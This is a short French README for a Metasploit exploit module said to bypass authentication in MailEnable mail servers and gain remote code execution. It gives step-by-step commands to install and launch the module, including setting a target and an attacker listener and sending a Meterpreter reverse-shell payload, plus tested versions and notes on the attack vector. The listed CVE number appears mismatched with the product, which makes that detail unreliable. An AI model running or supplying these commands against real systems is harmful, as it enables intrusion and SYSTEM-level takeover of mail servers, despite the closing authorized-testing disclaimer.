
Module Metasploit pour MailEnable CVE-2022-36934 contournement de l'authentification RCE
Module Metasploit pour la vulnérabilité de contournement d'authentification de MailEnable (CVE-2022-36934), menant à une exécution de code à distance.
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 Testé sur :
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 Détails techniques :
Vulnérabilité : Contournement de l'authentification via une syntaxe de type SQLi dans SMTP/POP3
Vecteur d'attaque : Réseau (ports 25/110)
Privilèges : S'exécute avec le compte de service MailEnable (souvent SYSTEM)
⚠️ Avertissement légal :
Cet outil est réservé aux tests autorisés. Ne l'utilisez jamais contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester.